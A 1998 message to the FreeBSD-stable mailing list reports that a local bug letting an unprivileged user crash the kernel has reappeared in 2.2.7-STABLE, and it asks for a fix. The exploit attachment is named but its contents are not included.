Date: Tue, 11 Aug 1998 00:31:03 -0700 (PDT)
From: Scott
To: FreeBSD-stable@FreeBSD.ORG
Subject: Huge Bug in FreeBSD not fixed?

I ran across this bug a while back on rootshell, and then again by a user on IRC who offered to take down my box. Soon after that, the bug was fixed and things were fine. But just out of boredom, I decided to run the exploit again. Sure enough, I had a kernel panic and that was it. All of this from a normal user account.

The bug has reoccurred recently and may cause problems on my server if the users find out about the vulnerability. I am running FreeBSD 2.2.7-STABLE (Last compiled on August 5th early in the morning). The system is running on a PII233 with 64MB RAM.

This bug REALLY needs to be fixed ASAP. I would like to know if other systems are vulnerable as well. I discussed this matter on IRC and everyone said they had similar problems.
This bug needs to be addressed soon. I would HATE switching to linux because my system keeps crashing.

---------------
Scott Swindells, SchematiX.NET

Attachment: bsdbug.c (TEXT/PLAIN; charset=US-ASCII; Content-Transfer-Encoding: BASE64)